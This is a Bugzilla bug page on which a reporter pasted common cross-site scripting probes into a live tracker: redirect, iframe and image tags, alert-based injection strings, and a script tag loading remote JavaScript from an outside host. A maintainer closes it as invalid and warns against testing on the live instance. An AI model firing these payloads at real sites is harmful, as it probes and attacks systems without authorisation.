Closed
Bug 772015
Opened 13 years ago
Closed 13 years ago
dsfsdfds
Categories
(Bugzilla :: Creating/Changing Bugs, defect)
Tracking
()
RESOLVED
INVALID
People
(Reporter: eusebiu.blindu, Unassigned)
Details
Attachments
(1 file)
24.30 KB,
text/plain
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Steps to reproduce:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Actual results:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Expected results:
1)REDIRECT
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.testalways.com">
2)IFRAME
<iframe src="http://www.testalways.com/"></iframe>
3)IMAGE tag
<img src="http://www.testalways.com/utest/hack.gif" />
<img src="http://bit.ly/J9EeDQ" />
4)
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
5)
'';!--"<XSS>=&{()}
6)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
7)
<IMG SRC="javascript:alert('XSS');">
8)http://ha.ckers.org/xss.html
Please don't create test bugs here, this is a live Bugzilla instance.
Use http://landfill.bugzilla.org/ if you want to test things.
If you continue to abuse the system your account will be locked.
Status: UNCONFIRMED → RESOLVED
Closed: 13 years ago
Resolution: --- → INVALID